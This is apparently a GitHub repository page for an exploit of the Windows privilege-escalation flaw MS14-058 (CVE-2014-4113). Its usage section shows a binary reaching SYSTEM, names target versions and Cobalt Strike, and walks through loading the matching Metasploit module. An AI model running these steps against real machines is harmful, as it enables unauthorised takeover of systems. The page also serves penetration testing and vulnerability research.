Skip to content

Latest commit

 

History

History

MS14-058

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 
 
 

MS14-058

  • Trigger and exploit code for CVE-2014-4113
  • The poc was from @sam-b

Vulnerability reference:

Usage

c:> Win64.exe whoami nt authority\system

win7
Cobalt Strike 2008
2008

load the module within the Metasploit console

    msf > use exploit/windows/local/ms14_058_track_popup_menu
    msf exploit(ms14_058_track_popup_menu) > show targets
          ...targets...
    msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
    msf exploit(ms14_058_track_popup_menu) > show options
          ...show and set options...
    msf exploit(ms14_058_track_popup_menu) > exploit

Links